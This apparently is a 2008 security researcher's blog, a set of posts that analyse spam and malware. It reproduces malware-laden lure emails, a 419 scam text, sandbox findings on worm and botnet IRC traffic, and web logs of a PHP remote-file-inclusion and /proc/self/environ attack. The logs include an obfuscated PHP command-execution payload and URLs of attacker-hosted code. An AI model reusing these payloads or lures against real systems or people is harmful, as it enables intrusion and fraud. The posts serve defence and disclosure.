Needless to say, if you receive an e-mail claiming to come from MediaDefender, delete it (MD should be ignored anyway in my opinion (and indeed, in alot of others opinions too))

As usual, the following is the e-mail itself in all it's glory.


Exported by: Outlook Export v0.1.2


From: monitoring@mediadefender.com
E-mail:monitoring@mediadefender.com [ 207.171.9.16 - netblk-207-171-9-16.fiberconnexion.com ]
Date: 10/09/2008 13:45:55
Subject: Your illegal internet activities are being logged
**************************************************************************
Links
**************************************************************************

Link: http://mediadefender.com/images/md_logo.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/spacer.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_about_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_sep.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_p2ppir_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_p2pmkt_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/btn_sep.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_news_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_contact_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://btjunkie.org
    Domain: btjunkie.org
    IP: 93.158.65.211 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://sumotorrent.com/
    Domain: sumotorrent.com
    IP: 87.233.179.137 [ - ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://isohunt.com
    Domain: isohunt.com
    IP: 208.71.112.30 [ bthub.com ]
    hpHosts Status: Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.btscene.com/
    Domain: www.btscene.com
    IP: 213.239.187.52 [ btscene.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.mininova.org
    Domain: www.mininova.org
    IP: 87.233.147.140 [ www.mininova.org ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://fenopy.com/
    Domain: fenopy.com
    IP: 208.71.113.234 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://monova.org
    Domain: monova.org
    IP: 66.29.46.106 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://yotoshi.com/
    Domain: yotoshi.com
    IP: 222.228.121.5 [ s5.IchibaFL100.vectant.ne.jp ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://getinvites.org/
    Domain: getinvites.org
    IP: 83.149.109.52 [ nephesus.nshosters.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.btmon.com/
    Domain: www.btmon.com
    IP: 66.29.81.140 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://mediadefender.com/images/md_logo.gif>     
<http://mediadefender.com/images/spacer.gif>     
About Us<http://mediadefender.com/images/btn_about_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      <http://mediadefender.com/images/btn_p2ppir_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      <http://mediadefender.com/images/btn_p2pmkt_off.gif>      <http://mediadefender.com/btn_sep.gif>      News<http://mediadefender.com/images/btn_news_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      Contact Us<http://mediadefender.com/images/btn_contact_off.gif>     
<http://mediadefender.com/images/spacer.gif>     
<http://mediadefender.com/images/spacer.gif>     

Dear User!


Your recent internet activity was logged on the following sites:

*    Btjunkie <http://btjunkie.org>
*    SumoTorrent <http://sumotorrent.com/>
*    isoHunt <http://isohunt.com>
*    Btscene <http://www.btscene.com/>
*    Mininova <http://www.mininova.org>
*    Fenopy <http://fenopy.com/>
*    Monova <http://monova.org>
*    Yotoshi <http://yotoshi.com/>
*    GetInvites <http://getinvites.org/>
*    Btmon <http://www.btmon.com/>

We have attached a report about the copyrighted movies, music, softwares you downloaded or searched on these webpages. We strongly advise you to stop any future activities regarding the downloading of illegal content or you can expect prosecution by 17 U.S.C. §§ 512, 1201§1205, 1301§1332; 28 U.S.C. § 4001 laws.

Sincerely,

MediaDefender Inc.




**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2> <<A HREF="http://mediadefender.com/images/md_logo.gif">http://mediadefender.com/images/md_logo.gif</A>> <BR>
 <<A HREF="http://mediadefender.com/images/spacer.gif">http://mediadefender.com/images/spacer.gif</A>>  <BR>
 About Us<<A HREF="http://mediadefender.com/images/btn_about_off.gif">http://mediadefender.com/images/btn_about_off.gif</A>>     <<A HREF="http://mediadefender.com/images/btn_sep.gif">http://mediadefender.com/images/btn_sep.gif</A>>   <<A HREF="http://mediadefender.com/images/btn_p2ppir_off.gif">http://mediadefender.com/images/btn_p2ppir_off.gif</A>>    <<A HREF="http://mediadefender.com/images/btn_sep.gif">http://mediadefender.com/images/btn_sep.gif</A>>   <<A HREF="http://mediadefender.com/images/btn_p2pmkt_off.gif">http://mediadefender.com/images/btn_p2pmkt_off.gif</A>>    <<A HREF="http://mediadefender.com/btn_sep.gif">http://mediadefender.com/btn_sep.gif</A>>          News<<A HREF="http://mediadefender.com/images/btn_news_off.gif">http://mediadefender.com/images/btn_news_off.gif</A>>          <<A HREF="http://mediadefender.com/images/btn_sep.gif">http://mediadefender.com/images/btn_sep.gif</A>>   Contact Us<<A HREF="http://mediadefender.com/images/btn_contact_off.gif">http://mediadefender.com/images/btn_contact_off.gif</A>>       <BR>
 <<A HREF="http://mediadefender.com/images/spacer.gif">http://mediadefender.com/images/spacer.gif</A>>  <BR>
 <<A HREF="http://mediadefender.com/images/spacer.gif">http://mediadefender.com/images/spacer.gif</A>>  <BR>
<BR>
Dear User!<BR>
<BR>
<BR>
Your recent internet activity was logged on the following sites:<BR>
<BR>
*       Btjunkie <<A HREF="http://btjunkie.org">http://btjunkie.org</A>><BR>
*       SumoTorrent <<A HREF="http://sumotorrent.com/">http://sumotorrent.com/</A>><BR>
*       isoHunt <<A HREF="http://isohunt.com">http://isohunt.com</A>><BR>
*       Btscene <<A HREF="http://www.btscene.com/">http://www.btscene.com/</A>><BR>
*       Mininova <<A HREF="http://www.mininova.org">http://www.mininova.org</A>><BR>
*       Fenopy <<A HREF="http://fenopy.com/">http://fenopy.com/</A>><BR>
*       Monova <<A HREF="http://monova.org">http://monova.org</A>><BR>
*       Yotoshi <<A HREF="http://yotoshi.com/">http://yotoshi.com/</A>><BR>
*       GetInvites <<A HREF="http://getinvites.org/">http://getinvites.org/</A>><BR>
*       Btmon <<A HREF="http://www.btmon.com/">http://www.btmon.com/</A>><BR>
<BR>
We have attached a report about the copyrighted movies, music, softwares you downloaded or searched on these webpages. We strongly advise you to stop any future activities regarding the downloading of illegal content or you can expect prosecution by 17 U.S.C. §§ 512, 1201§1205, 1301§1332; 28 U.S.C. § 4001 laws.<BR>
<BR>
Sincerely,<BR>
<BR>
MediaDefender Inc.<BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <monitoring@mediadefender.com>
Delivered-To: services@[RD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
    by smtp-in-77.livemail.co.uk (Postfix) with SMTP id 8445AEFC4ED
    for <services@[RD]>; Wed, 10 Sep 2008 13:54:00 +0100 (BST)
Received: from mediadefender.com (mail.squires.co.za [196.37.170.133])
    by smtp-in-77.livemail.co.uk (Postfix) with ESMTP id 48D4CEFC4ED
    for <services@[RD]>; Wed, 10 Sep 2008 13:51:43 +0100 (BST)
From: monitoring@mediadefender.com
To: services@[RD]
Subject: Your illegal internet activities are being logged
Date: Wed, 10 Sep 2008 14:45:55 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0008_DE9EEA5E.EDC8D727"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080910125143.48D4CEFC4ED@smtp-in-77.livemail.co.uk>
X-Original-To: services@[RD]


/edit 23-09-08

It seems these are still doing the rounds as I've just received another one. Whilst the e-mail and zip's filename is identical to the last, the infection in this one is HIDDENEXT/Worm.Gen with a new size of 324K.

http://www.virustotal.com/analisis/39fdcd263877cae49faaa6e4a2576401

Well well well, this is an interesting little sample isn't it ..... Running the file through ThreatExpert shows multiple outgoing connections (IRC, SMTP). Two GET requests were made to download additional components;

http://www.isc.org/ISC-gears2.png
http://www.isc.org/automation/n09230945.asp

Other connections include;

sco.rs-forum.biz Port: 5900
mxs.isp.com Port: 5900
206.137.17.89 Port: 5900

rs-forum.biz claims to be a parked page (yeah right!)

http://vurl.mysteryfcm.co.uk/?url=http://rs-forum.biz/&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=1&ref=

The IRC connection shows it's joining the #biohazard2 channel, and generating the following traffic;

NICK BX|162490404
USER dfewojeuaf 0 0 :BX|162490404
USERHOST BX|162490404
MODE BX|162490404 -ix
JOIN #biohazard2 youareadumbfuck
NICK BX|815533618
USER lnonqyumtlt 0 0 :BX|815533618
USERHOST BX|815533618
MODE BX|815533618 -ix
NICK BX|165626277
USER nddpsdtcfmz 0 0 :BX|165626277
USERHOST BX|165626277
MODE BX|165626277 -ix
NICK BX|238465948
USER ntzxwcaoprz 0 0 :BX|238465948
USERHOST BX|238465948
MODE BX|238465948 -ix
NICK BX|344699429
USER qcbbouebg 0 0 :BX|344699429
USERHOST BX|344699429
MODE BX|344699429 -ix


The full TE report can be found at;

http://www.threatexpert.com/report.aspx?md5=713885a1432fc4a822f9473828045952
Posted by MysteryFCM at 05:39
0 comments

My bank made a woopsie? Nope actually, they didn't .....

Thats right folks, the scammers are back - and this time they're holding an infection (guess the phishing stuff wasn't working as well for them?). I've received 27 of these so far, and other than the sender, they're all virtually identical;


Greetings!

Yesterday I received a message from your bank with your account statement. I don’t need problems with the police because of your bank’s error!!! Please contact your bank and ask them to not mistakenly send me your personal data to me.

For the proof of my non-participation in obtaining your personal data, I am attaching the copy of the message containing your account statement which I had received via e-mail!!!!

You must print the copy of the message and pass it on to the bank, so that they wouldn’t mistakenly send me your personal bank account data.


The attachment? BANK_DETAILS.zip, which contains a 66.5KB file called .... wait for it .... BANK_DETAILS.exe, with an Excel icon to make you think it's an XLS file (naughty scammer!). Detection alas, isn't that good, with only 16/32 detecting it.

http://www.virustotal.com/analisis/ea81b8ad78cb532af14368694ef53b54

Alas the Sunbelt sandbox claims the file has already been analyzed but err;

http://research.sunbelt-software.com/ViewMalware.aspx?id=5561279

Where is it? Instead, I've submitted it both to Anubis and to the Microsoft sandbox - results will be posted when I receive them. In the meantime, the e-mail itself is below.


Exported by: Outlook Export v0.1.2


From: Ali Rosen
E-mail:lvhvljivf@bobgail.com [ 63.206.146.140 - bobgail.com ]
Date: 10/09/2008 07:14:29
Subject: I received a message from your bank
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Greetings!

Yesterday I received a message from your bank with your account statement.
I don’t need problems with the police because of your bank’s error!!!
Please contact your bank and ask them to not mistakenly send me your personal data to me.
For the proof of my non-participation in obtaining your personal data, I am attaching the copy of the message containing your account statement which I had received via e-mail!!!!
You must print the copy of the message and pass it on to the bank, so that they wouldn’t mistakenly send me your personal bank account data.


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Greetings!<BR>
<BR>
Yesterday I received a message from your bank with your account statement.<BR>
I don’t need problems with the police because of your bank’s error!!!<BR>
Please contact your bank and ask them to not mistakenly send me your personal data to me.<BR>
For the proof of my non-participation in obtaining your personal data, I am attaching the copy of the message containing your account statement which I had received via e-mail!!!!<BR>
You must print the copy of the message and pass it on to the bank, so that they wouldn’t mistakenly send me your personal bank account data.<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <lvhvljivf@bobgail.com>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-125.livemail.co.uk (Postfix) with SMTP id 51454534187
for <services@[RMVD]>; Wed, 10 Sep 2008 07:14:33 +0100 (BST)
Received: from 84.red-80-34-50.staticip.rima-tde.net (84.Red-80-34-50.staticIP.rima-tde.net [80.34.50.84])
by smtp-in-125.livemail.co.uk (Postfix) with ESMTP id 7643253420C
for <nobody@[RMVD]>; Wed, 10 Sep 2008 07:14:27 +0100 (BST)
Received: from [80.34.50.84] by smtp-relay.pbi.net; Wed, 10 Sep 2008 07:14:29 +0100
Date: Wed, 10 Sep 2008 07:14:29 +0100
From: "Ali Rosen" <lvhvljivf@bobgail.com>
X-Mailer: The Bat! (v2.12.00) Business
Reply-To: lvhvljivf@bobgail.com
X-Priority: 3 (Normal)
Message-ID: <220419770.17700592054610@bobgail.com>
To: nobody@[RMVD]
Subject: I received a message from your bank
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------1A213674BF6E82"
X-Original-To: nobody@[RMVD]


/edit

As mentioned, the following are the Anubis and MS sandbox results;

http://anubis.iseclab.org/result.php?taskid=fdd6caea727f37847548aeba86a4f473

http://www.microsoft.com/security/portal/Entry.aspx?name=PWS%3aWin32%2fZbot.UV

No really, that IS all Microsoft decided to send for this one!
Posted by MysteryFCM at 05:28
0 comments

419'ers want to stop fraud, scam and money laundering

No really, they do - they said so, look! (extra points if you notice the sarcasm)

These scams really are nothing new, they've been going on for years, though there's hundreds of variations, the plot is always the same - sucker someone to give their details and money (but please Mr 419'er, STOP USING ALL CAPS - IT'S ANNOYING!).


Exported by: Outlook Export v0.1.2


From: smtp.orange.nl
E-mail:courierexpress@orange.nl [ 62.37.237.15 - Resolution failed ]
Date: 10/09/2008 12:49:47
Subject: ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.

THIS LETTER IS TO BRING TO YOUR NOTICE THAT YOU’RE FUND HAS BEEN TRANSFER TO A BANK IN LONDON THROUGH ELECTRONIC BANKING TRANSFER SYSTEM OF PAYMENT, THEREFORE I WILL SEND YOU THE BANK TELEX CONTACT IMMEDIATELY.
THIS SYSTEM OF PAYMENT WILL CREDIT YOUR FUND DIRECT TO YOUR BANK ACCOUNT IN SWIFT CODE MY ADVISED TO YOU IS IF YOU KNOW ANY PERSON FAMILY OR FRIEND THAT HAS LOST MONEY TOFRAUDSTERS PLEASE TELL HIM/HER TO WRITE TO THIS COMMISSION WITH PROVES AND WE WILL HANDLE HIS/HER CASE THEN PAY BACK AFTER VERIFICATION.
NOTE” YOUR URGENT ACTION IS HIGHLY NEEDED AS TO RECEIVE THE ORIGINAL COPY OF THE TRANSFER SLIP TO ENABLE YOU CONFIRM YOUR FUND IN YOUR BANK ACCOUNT, THIS SYSTEM OF PAYMENT IS TO CONTROL FRAUD, SCAM AND MONEY LAUNDERING. 
  
ALL THE AFRICAN CRIME FIGHTERS LEADERS HAS COME TOGETHER TO INFORM THE WORLD WHAT IS GOING ON NOW AND WE HAVE RECOVER OVER $322 MILLION DOLLARS(THREE HUNDRED AND TWENTY TWO MILLION DOLLARS) FROM THE PEOPLE WE HAVE BEHIND BARS. THE ONLY REASON WE ARE WRITING YOU THIS LETTER, IS BECAUSE YOUR NAME WAS GIVEN TO US BY ONE OF THE FRAUDSTERS IN OUR JAIL HOUSE, THAT HE COLLECTED MONEY FROM BY TRICKS.

NOTE THAT YOU ARE TO FOLLOW THE INSTRUCTIONS AS IT HAS BEEN GIVEN TO YOU TO AVOID ANY MISTAKE. ALSO NOTE THAT YOU ARE ADVICE TO PROVIDE US YOUR CONTACT TELEPHONE NUMBER SO THAT WE CAN TALK MORE ON PHONE REGARDING THE PRESENT SITUATION KEEP IN TOUCH.
MR.WILLIAMS JOHNSON
0044-7031828628


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.<BR>
<BR>
THIS LETTER IS TO BRING TO YOUR NOTICE THAT YOU’RE FUND HAS BEEN TRANSFER TO A BANK IN LONDON THROUGH ELECTRONIC BANKING TRANSFER SYSTEM OF PAYMENT, THEREFORE I WILL SEND YOU THE BANK TELEX CONTACT  IMMEDIATELY.<BR>
THIS SYSTEM OF PAYMENT WILL CREDIT YOUR FUND DIRECT TO YOUR BANK ACCOUNT IN SWIFT CODE MY ADVISED TO YOU IS IF YOU KNOW ANY PERSON FAMILY OR FRIEND THAT HAS LOST MONEY TOFRAUDSTERS PLEASE TELL HIM/HER TO WRITE TO THIS COMMISSION WITH PROVES AND WE WILL HANDLE HIS/HER CASE THEN PAY BACK AFTER VERIFICATION.<BR>
NOTE” YOUR URGENT ACTION IS HIGHLY NEEDED AS TO RECEIVE THE ORIGINAL COPY OF THE TRANSFER SLIP TO ENABLE YOU CONFIRM YOUR FUND IN YOUR BANK ACCOUNT, THIS SYSTEM OF PAYMENT IS TO CONTROL FRAUD, SCAM AND MONEY LAUNDERING. <BR>
   <BR>
ALL THE AFRICAN CRIME FIGHTERS LEADERS HAS COME TOGETHER TO INFORM THE WORLD WHAT IS GOING ON NOW AND WE HAVE RECOVER OVER $322 MILLION DOLLARS(THREE HUNDRED AND TWENTY TWO MILLION DOLLARS) FROM THE PEOPLE WE HAVE BEHIND BARS. THE ONLY REASON WE ARE WRITING YOU THIS LETTER, IS BECAUSE YOUR NAME WAS GIVEN TO US BY ONE OF THE FRAUDSTERS IN OUR JAIL HOUSE, THAT HE COLLECTED MONEY FROM BY TRICKS.          <BR>
<BR>
NOTE THAT YOU ARE TO FOLLOW THE INSTRUCTIONS AS IT HAS BEEN GIVEN TO YOU TO AVOID ANY MISTAKE. ALSO NOTE THAT YOU ARE ADVICE TO PROVIDE US YOUR CONTACT TELEPHONE NUMBER SO THAT WE CAN TALK MORE ON PHONE REGARDING THE PRESENT SITUATION KEEP IN TOUCH.<BR>
MR.WILLIAMS JOHNSON<BR>
0044-7031828628<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <courierexpress@orange.nl>
Delivered-To: services@[RMV]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-116.livemail.co.uk (Postfix) with SMTP id DBDF05FE8D6
for <services@[RMV]>; Wed, 10 Sep 2008 12:51:38 +0100 (BST)
Received: from smtp-out.orange.net (smtp-out.orange.net [193.252.22.118])
by smtp-in-116.livemail.co.uk (Postfix) with ESMTP id D2E115FE8D6
for <technicalsupport@[RMV]>; Wed, 10 Sep 2008 12:51:38 +0100 (BST)
Received: from me-wanadoo.net (localhost [127.0.0.1])
by mwinf7009.orange.net (SMTP Server) with ESMTP id 812251C0008B;
Wed, 10 Sep 2008 13:51:38 +0200 (CEST)
Received: from User (dhcp2068.myzipnet.com [41.202.20.68])
by mwinf7009.orange.net (SMTP Server) with ESMTP id 71DE01C0009D;
Wed, 10 Sep 2008 13:51:08 +0200 (CEST)
X-ME-UUID: 20080910115108466.71DE01C0009D@mwinf7009.orange.net
Reply-To: <williamsk3johnson@gmail.com>
From: "smtp.orange.nl" <courierexpress@orange.nl>
Subject: ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.
Date: Wed, 10 Sep 2008 12:49:47 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20080910115108.71DE01C0009D@mwinf7009.orange.net>
To: undisclosed-recipients: ;
X-Original-To: technicalsupport@[RMV]


In this case, the phone number they've given is a UK mobile on the Magrathea Telecom network;

0044-7031828628

Thankfully, Magrathea are fantastic at responding and shutting these down for me (other telco's need to take heed!!!). If you receive one of these, and it begins with an +44 (0044) number, stick it into the following and obtain the company that provides the number, then forward them the e-mail (tell 'em I told you to!);

http://www.ukphoneinfo.com/section/tci/locator.shtml

Hint: I've provided a few you can use over at: http://forum.hosts-file.net/viewtopic.php?f=54&t=340

/edit

Damn, they're getting quicker! 10 mins or so after reporting the above to Magrathea, I got a reply (used to take upto a few hours). Thank you Laura!!!

Dear Steven

Thank you for bringing this matter to our attention. If this number is in breach of our terms and conditions then it will be suspended.

Best regards
Laura

Laura Newberry
Magrathea Telecom


/edit 2

Laura wrote to clarify that the 070 numbers aren't actually mobile numbers, but personal numbers;


Cool - my name in lights! ;o)

Just so you're aware though, numbers beginning with 070 aren't actually mobile numbers, they are what are called Personal Numbers. (Sometimes called virtual numbers or "follow me" numbers.) This kind of number can be forwarded to any existing landline or mobile number in the UK or abroad. So while they could be being forwarded to a mobile, the number itself isn't actually a mobile number. That will be true of other 070 numbers supplied by other telcos, not just the ones provided by us.

Hope this helps!
Laura


and;

Hi Steven

Yes that is fine! If you google "Personal Number" it comes up with this link on the Ofcom website, which may give you some helpful info about Personal Numbering as well:

http://www.ofcom.org.uk/telecoms/ioi/numbers/num_070_guide

Kind regards
Laura


Cheers Laura :)
Posted by MysteryFCM at 05:00
0 comments

Alas, another exploit attempt (RFI+PHP)

Alas, it seems 88.84.157.127 (v32747.1blu.de) badly wanted to exploit my server. From the wonderful world of logs, we have (note that the scroll bars won't display in IE for some reason);


2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
